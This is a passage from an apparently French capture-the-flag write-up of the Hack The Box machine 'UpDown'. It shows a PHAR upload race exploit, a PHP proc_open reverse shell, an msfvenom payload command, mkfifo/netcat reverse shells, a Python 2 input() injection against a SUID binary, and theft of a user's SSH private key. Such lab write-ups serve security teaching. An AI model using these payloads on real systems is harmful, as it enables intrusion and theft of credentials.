</span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST / HTTP/1.1 </span></span><span class="line"><span class="cl">Host: dev.siteisup.htb </span></span><span class="line"><span class="cl">Special-Dev: only4dev </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Ubuntu<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:144.0<span class="o">)</span> Gecko/20100101 Firefox/144.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: multipart/form-data<span class="p">;</span> <span class="nv">boundary</span><span class="o">=</span>----geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 </span></span><span class="line"><span class="cl">Content-Length: <span class="m">652</span> </span></span><span class="line"><span class="cl">Origin: http://dev.siteisup.htb </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://dev.siteisup.htb </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 </span></span><span class="line"><span class="cl">Content-Disposition: form-data<span class="p">;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;file&#34;</span><span class="p">;</span> <span class="nv">filename</span><span class="o">=</span><span class="s2">&#34;shell.phar&#34;</span> </span></span><span class="line"><span class="cl">Content-Type: application/x-php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://siteisup.com </span></span><span class="line"><span class="cl">http://10.10.10.10 </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://siteisup.com </span></span><span class="line"><span class="cl">http://10.10.10.10 </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl">http://siteisup.com </span></span><span class="line"><span class="cl">http://10.10.10.10 </span></span><span class="line"><span class="cl">http://google.com </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"><span class="nb">echo</span> file_get_contents<span class="o">(</span> <span class="s2">&#34;/etc/passwd&#34;</span> <span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">?&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 </span></span><span class="line"><span class="cl">Content-Disposition: form-data<span class="p">;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;check&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Check </span></span><span class="line"><span class="cl">------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8-- </span></span></code></pre></td></tr></table> </div> </div><p>Le code source de <strong>checker.php</strong> récupérer dans le <strong>.git</strong>, nous montre que les fichiers sont uploader dans un dossier du nom de:</p> <blockquote> <p>md5(time())</p> </blockquote> <p>On a donc créer le code bash suivant, afin de retrouver rapidement le fichier shell.phar : <code>md5.sh</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="cp">#!/bin/bash </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">timestamp</span><span class="o">=</span><span class="k">$(</span>date +%s<span class="k">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> i in <span class="o">{</span>1..10<span class="o">}</span><span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="nv">t</span><span class="o">=</span><span class="k">$((</span><span class="nv">$timestamp</span><span class="o">-</span><span class="nv">$i</span><span class="k">))</span> </span></span><span class="line"><span class="cl"> <span class="nv">md5</span><span class="o">=</span><span class="k">$(</span><span class="nb">echo</span> -n <span class="nv">$t</span> <span class="p">|</span> md5sum <span class="p">|</span> cut -d<span class="s1">&#39; &#39;</span> -f1<span class="k">)</span> </span></span><span class="line"><span class="cl"> <span class="c1">#echo $md5</span> </span></span><span class="line"><span class="cl"> <span class="nv">url</span><span class="o">=</span><span class="s1">&#39;http://dev.siteisup.htb/uploads/&#39;</span><span class="nv">$md5</span><span class="s1">&#39;/&#39;</span><span class="nv">$1</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="s2">&#34;curl &#34;</span><span class="nv">$url</span><span class="s2">&#34; -H &#39;Special-Dev: only4dev&#39; -i&#34;</span> </span></span><span class="line"><span class="cl"> curl <span class="nv">$url</span> -H <span class="s1">&#39;Special-Dev: only4dev&#39;</span> -i </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ce code <strong>Bash</strong> génère 10 noms de dossiers possible pour les 10 dernières secondes écoulées, puis effectuer des requêtes curl avec ces 10 dossiers vers le fichier shell.phar.</p> <p>Lors de l&rsquo;execution de notre requpête Burp, il suffit ensuite d&rsquo;executer notre script Bash qui va retrouver notre fichier shell.phar et executer le code PHP présent. ATTENTION, dans la requete Burp, il faut rajouter beaucoup de :</p> <blockquote> <p><a class="link" href="http://google.com" target="_blank" rel="noopener" >http://google.com</a> <a class="link" href="http://google.com" target="_blank" rel="noopener" >http://google.com</a> &hellip;</p> </blockquote> <p>au début de la requête.</p> <p>En effet, le fichier <strong>shell.phar</strong> est créer uniquement le temps de vérification des URL par le checker.php. Plus on met d&rsquo;URL, plus le temps d&rsquo;execution est long et notre fichier n&rsquo;est pas supprimé.</p> <p>Dans un premier temps, on a afficher <strong>/etc/passwd</strong> :</p> <blockquote> <p>./md5.sh shell.phar</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root:x:0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">bin:x:2:2:bin:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sys:x:3:3:sys:/dev:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sync:x:4:65534:sync:/bin:/bin/sync </span></span><span class="line"><span class="cl">games:x:5:60:games:/usr/games:/usr/sbin/nologin </span></span><span class="line"><span class="cl">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin </span></span><span class="line"><span class="cl">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin </span></span><span class="line"><span class="cl">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin </span></span><span class="line"><span class="cl">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin </span></span><span class="line"><span class="cl">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin </span></span><span class="line"><span class="cl">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin </span></span><span class="line"><span class="cl">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin </span></span><span class="line"><span class="cl">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin </span></span><span class="line"><span class="cl">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">messagebus:x:103:106::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">syslog:x:104:110::/home/syslog:/usr/sbin/nologin </span></span><span class="line"><span class="cl">_apt:x:105:65534::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false </span></span><span class="line"><span class="cl">uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sshd:x:109:65534::/run/sshd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin </span></span><span class="line"><span class="cl">pollinate:x:111:1::/var/cache/pollinate:/bin/false </span></span><span class="line"><span class="cl">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin </span></span><span class="line"><span class="cl">lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false </span></span><span class="line"><span class="cl">developer:x:1002:1002::/home/developer:/bin/bash </span></span></code></pre></td></tr></table> </div> </div><h3 id="reverse-shell---proc_open">Reverse Shell - proc_open </h3><p>En regardant la sortie de phpinfo(), on découvre qu&rsquo;une liste de fonctions est bloqué:</p> <ul> <li>system, shell_exec, exec&hellip;</li> </ul> <p>Les fonctions utilisées habituellement pour executer des commandes et obtenir un reverse shell ne fonctionnent pas.</p> <p>Cependant, après quelques recherches on trouve le fonction <strong>proc_open</strong> qui n&rsquo;est pas bloqué et permet d&rsquo;executer du code :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"><span class="nv">$descriptorspec</span> <span class="o">=</span> array<span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="nv">0</span> <span class="o">=</span>&gt; array<span class="o">(</span><span class="s2">&#34;pipe&#34;</span>, <span class="s2">&#34;r&#34;</span><span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="nv">1</span> <span class="o">=</span>&gt; array<span class="o">(</span><span class="s2">&#34;pipe&#34;</span>, <span class="s2">&#34;w&#34;</span><span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="nv">2</span> <span class="o">=</span>&gt; array<span class="o">(</span><span class="s2">&#34;pipe&#34;</span>, <span class="s2">&#34;w&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span> <span class="o">=</span> <span class="s2">&#34;bash -c &#39;bash -i &gt;&amp; /dev/tcp/10.10.14.14/4444 0&gt;&amp;1&#39;&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$process</span> <span class="o">=</span> proc_open<span class="o">(</span><span class="nv">$cmd</span>, <span class="nv">$descriptorspec</span>, <span class="nv">$pipes</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">(</span>is_resource<span class="o">(</span><span class="nv">$process</span><span class="o">))</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> fclose<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>0<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> stream_get_contents<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>1<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> fclose<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>1<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> stream_get_contents<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>2<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> fclose<span class="o">(</span><span class="nv">$pipes</span><span class="o">[</span>2<span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> proc_close<span class="o">(</span><span class="nv">$process</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">?&gt; </span></span></code></pre></td></tr></table> </div> </div><p>La meilleure technique aurait été de directement généré un reverse shell php à l&rsquo;aide de <strong>msfvenom</strong>. Ce code php teste 1 par 1 toutes les fonctions permettant l&rsquo;execution de commandes systèmes :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p php/reverse_php <span class="nv">LHOST</span><span class="o">=</span>10.10.14.14 <span class="nv">LPORT</span><span class="o">=</span><span class="m">1337</span> -f raw &gt; shell.php </span></span></code></pre></td></tr></table> </div> </div><p>En utilisant ce code, on obient directement un reverse shell à l&rsquo;aide de <strong>proc_open</strong>. Le problème avec cette méthode est qu&rsquo;on ne sait pas forcement quelle fonction à permis d&rsquo;obtenir le reverse shell.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177:49708. </span></span><span class="line"><span class="cl">socket_create </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">www-data </span></span><span class="line"><span class="cl">rm /tmp/f<span class="p">;</span>mkfifo /tmp/f<span class="p">;</span>cat /tmp/f<span class="p">|</span>bash -i 2&gt;<span class="p">&amp;</span>1<span class="p">|</span>nc 10.10.14.14 <span class="m">1338</span> &gt;/tmp/f </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------- </span></span><span class="line"><span class="cl"><span class="c1"># Better shell</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1338 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1338 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177:35496. </span></span><span class="line"><span class="cl">sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ whoami </span></span></span><span class="line"><span class="cl"><span class="s1">www-data </span></span></span><span class="line"><span class="cl"><span class="s1">$ python -c &#39;</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl">www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">&lt;ab47bcda3749f056619b17b959cdd659$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">13292</span> suspended nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>exegol-pentest<span class="o">]</span> downloads <span class="c1"># stty raw -echo;fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">13292</span> continued nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ </span></span></code></pre></td></tr></table> </div> </div><h2 id="www-data---developer">www-data -&gt; developer </h2><h3 id="suid-binary---python-injection">SUID binary - Python Injection </h3><p>On trouve un binaire <strong>siteiup</strong>. En l&rsquo;executant, on se rend compte qu&rsquo;il interprete directement le code de &ldquo;siteisup_test.py&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@updown:/home/developer$ ls </span></span><span class="line"><span class="cl">dev user.txt </span></span><span class="line"><span class="cl">www-data@updown:/home/developer$ <span class="nb">cd</span> dev </span></span><span class="line"><span class="cl">www-data@updown:/home/developer/dev$ ls -lah </span></span><span class="line"><span class="cl">total 32K </span></span><span class="line"><span class="cl">drwxr-x--- <span class="m">2</span> developer www-data 4.0K Jun <span class="m">22</span> <span class="m">2022</span> . </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">6</span> developer developer 4.0K Aug <span class="m">30</span> <span class="m">2022</span> .. </span></span><span class="line"><span class="cl">-rwsr-x--- <span class="m">1</span> developer www-data 17K Jun <span class="m">22</span> <span class="m">2022</span> siteisup </span></span><span class="line"><span class="cl">-rwxr-x--- <span class="m">1</span> developer www-data <span class="m">154</span> Jun <span class="m">22</span> <span class="m">2022</span> siteisup_test.py </span></span></code></pre></td></tr></table> </div> </div><p>Dans ce code Python, on observe l&rsquo;utilisation de la fonction &ldquo;input&rdquo;. De plus, le code est executé avec Python2 et non pas Python3. Sous Python2, lors de l&rsquo;utilisation de la fonction &ldquo;input&rdquo; Python ne considère pas par défaut qu&rsquo;il s&rsquo;agit d&rsquo;une String, et tente donc de le parser. On peut donc injecter du code python pour ouvrir un reverse shell. Sous Python3, la sortie de input(&quot;&quot;) est une Str par défaut donc pas d&rsquo;injection possible :</p> <p>Payload:</p> <blockquote> <p><strong>import</strong>(&lsquo;os&rsquo;).system(&lsquo;rm /tmp/b;mkfifo /tmp/b;cat /tmp/b|bash -i 2&gt;&amp;1|nc 10.10.14.14 8888 &gt;/tmp/b&rsquo;)</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">url</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s2">&#34;Enter URL here:&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">page</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">page</span><span class="o">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span> <span class="s2">&#34;Website is up&#34;</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span> <span class="s2">&#34;Website is down&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">-------------------------</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">www</span><span class="o">-</span><span class="n">data</span><span class="nd">@updown</span><span class="p">:</span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">developer</span><span class="o">/</span><span class="n">dev</span><span class="err">$</span> <span class="o">./</span><span class="n">siteisup</span> </span></span><span class="line"><span class="cl"><span class="n">Welcome</span> <span class="n">to</span> <span class="s1">&#39;siteisup.htb&#39;</span> <span class="n">application</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">Enter</span> <span class="n">URL</span> <span class="n">here</span><span class="p">:</span><span class="nb">__import__</span><span class="p">(</span><span class="s1">&#39;os&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">&#39;rm /tmp/b;mkfifo /tmp/b;cat /tmp/b|bash -i 2&gt;&amp;1|nc 10.10.14.14 8888 &gt;/tmp/b&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">rm</span><span class="p">:</span> <span class="n">cannot</span> <span class="n">remove</span> <span class="s1">&#39;/tmp/b&#39;</span><span class="p">:</span> <span class="n">No</span> <span class="n">such</span> <span class="n">file</span> <span class="ow">or</span> <span class="n">directory</span> </span></span></code></pre></td></tr></table> </div> </div><p>On obtient un nouveau reverse shell en tant que &lsquo;developer&rsquo;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nc -lnvp <span class="m">8888</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::8888 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:8888 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.177:45492. </span></span><span class="line"><span class="cl">developer@updown:/home/developer/dev$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">developer </span></span><span class="line"><span class="cl">developer@updown:/home/developer/dev$ <span class="nb">cd</span> .. </span></span><span class="line"><span class="cl">developer@updown:/home/developer$ ls -l .ssh </span></span><span class="line"><span class="cl">ls -l .ssh </span></span><span class="line"><span class="cl">total <span class="m">12</span> </span></span><span class="line"><span class="cl">-rw-rw-r-- <span class="m">1</span> developer developer <span class="m">572</span> Aug <span class="m">2</span> <span class="m">2022</span> authorized_keys </span></span><span class="line"><span class="cl">-rw------- <span class="m">1</span> developer developer <span class="m">2602</span> Aug <span class="m">2</span> <span class="m">2022</span> id_rsa </span></span><span class="line"><span class="cl">-rw-r--r-- <span class="m">1</span> developer developer <span class="m">572</span> Aug <span class="m">2</span> <span class="m">2022</span> id_rsa.pub </span></span><span class="line"><span class="cl">developer@updown:/home/developer$ cat .ssh/id_rsa </span></span><span class="line"><span class="cl">cat .ssh/id_rsa </span></span><span class="line"><span class="cl">-----BEGIN OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl">b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn </span></span><span class="line"><span class="cl">........ </span></span><span class="line"><span class="cl">3zga8EzubgwnpU7r9hN2jWboCCIOeDtvXFv08KT8pFDCCA+sMa5uoWQlBqmsOWCLvtaOWe </span></span><span class="line"><span class="cl">N4jA+ppn1+3e0AAAASZGV2ZWxvcGVyQHNpdGVpc3VwAQ<span class="o">==</span> </span></span><span class="line"><span class="cl">-----END OPENSSH PRIVATE KEY----- </span></span></code></pre></td></tr></table> </div> </div><p>On trouve la clé SSH de <strong>developer</strong> nous permettant de nous connecter facilement via ce protocole :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ vim developer.key </span></span><span class="line"><span class="cl">$ chmod <span class="m">600</span> developer.key </span></span><span class="line"><span class="cl">$ ssh developer@10.10.11.177 -i developer.key </span></span><span class="line"><span class="cl">Welcome to Ubuntu 20.04.5 LTS <span class="o">(</span>GNU/Linux 5.4.0-122-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl">Last login: Tue Aug <span class="m">30</span> 11:24:44 <span class="m">2022</span> from 10.10.14.36 </span></span><span class="line"><span class="cl">developer@updown:~$ cat user.txt </span></span><span class="line"><span class="cl">d235....edcf </span></span></code></pre></td></tr></table> </div> </div><h2 id="developer---root">developer 